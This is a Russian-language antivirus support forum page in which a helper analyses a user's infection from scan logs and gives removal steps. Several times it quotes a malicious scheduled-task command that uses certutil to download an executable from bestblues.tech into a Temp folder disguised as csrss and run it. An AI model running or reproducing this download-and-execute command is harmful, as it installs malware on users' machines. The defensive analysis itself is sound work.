Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
Программа показывает два объекта. Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :) Второй путь до директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe и не менее "интеллектуальной" маскировкой SCHEDULED.EXE SCHEDULED[S].EXE [/S] планировщик... ------------ В развёрнутом виде это:
[CODE]Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа Статус
Доп. информация на момент обновления списка Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
[CODE]Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE Имя файла SCHEDULED.EXE Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа Статус ПОДОЗРИТЕЛЬНЫЙ Инф. о файле Не удается найти указанный файл. Цифр. подпись проверка не производилась
Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ Путь до файла Типичен для вирусов и троянов
Доп. информация на момент обновления списка Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Подозрительные моменты: Temp; AppData; TaskCache; Csrss и т.д. Из интересного задействован системный: C:\WINDOWS\SYSTEM32\CERTUTIL.EXE *Certutil.exe — это программа командной строки, которая устанавливается как часть служб сертификации. Проверка ссылки на V.T.: https://www.virustotal.com/gui/url/1940aabfdff63a8fe9d94861b32d35c59daf14b164622ddc86511a0e4e00248a/detection
Ramzi Sadigli написал: Я так понял: во всем был виноват Ace Stream
В задачах была ссылка на сайт который запускал исполняемый файл.
Код
Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}
+
Код
Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла SCHEDULED.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус ПОДОЗРИТЕЛЬНЫЙ
Инф. о файле Не удается найти указанный файл.
Цифр. подпись проверка не производилась
Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла Типичен для вирусов и троянов
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
1) Скопируйте текст КОДа - в буфер обмена. uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена. ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ! ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !
после завершения сканирования: Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой ) На вкладке: Папки (Folders) для Mail.Ru и Yandex снимите [V]
Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие с автоперезагрузкой
3) Далее выполните FRST:
ESET не на системный диск, Как это будет работать?
1) Место могут занимать сами точки восстановления ( их можно удалить ) 2) Файл Подкачки ( временно отключить ) 3) Файл Гибернации (временно отключить ) Можно сжать файлы средствами самой системы. ( потом всё вернуть, как было )
Программа: TreeSize Free покажет, что и где занимает место на диске. jam-software.com/treesize_free
и\или
[URL=https://www.comss.ru/page.php?id=6811]Резервное копирование с помощью программы Acronis True Image 2020[/URL]
[QUOTE]Резервные копии, создаваемые программой Acronis True Image 2020, имеют расширение TIBX. По умолчанию они создаются с использованием сжатия данных, поэтому требуется гораздо меньше дискового пространства для их хранения. Степень сжатия всегда можно настроить перед запуском резервного копирования. В контекстном меню выбрать команду Сжать том... [/QUOTE] В общим читаем.
ESET не на системный диск, Как это будет работать?
Копии драйверов нужны, если они нужны :) ( можно отдельно почитать, для чего и как создаются копии драйверов ) ---- Можно взять флешку с установщиком системы Windows и создать на флешке свою папку\папки и кинуть туда нужные данные. т.е. это будет ваш: " установочный носитель " + ваши файлы. Установщик ваши папки и файлы в них просто проигнорирует.
ESET не на системный диск, Как это будет работать?
[QUOTE]Подозрительный Человек написал: 1. Качаю/обновляю все драйвера, чтобы они сохранились в бекапе [/QUOTE] Идея так себе. а) На момент восстановления бекапа драйвера всё равно устареют. б) Не всегда новые драйвера подходят\встают, так, как нужно. Поэтому многие и сидят на старых ( или часть новые часть старые ) в) Драйвера можно обновить но: 1) Создать резервную копию старых 2) Перед созданием бекапа некоторое время поработать и убедиться, что система нормально работает, корректно загружается в общем всё хорошо. Тогда и создавать бекап - иначе при восстановлении можно получить неожиданную проблему...
[QUOTE]Подозрительный Человек написал: То есть могут и флешке не дать записать/воспроизвести бекап? А как же тогда бекапить то?[/QUOTE]
Подразумевается, что человек который восстанавливает систему предварительно форматирует диск. т.е. устанавливает чистую систему на чистый диск. Или на систему без вирусов иначе какой смысл ?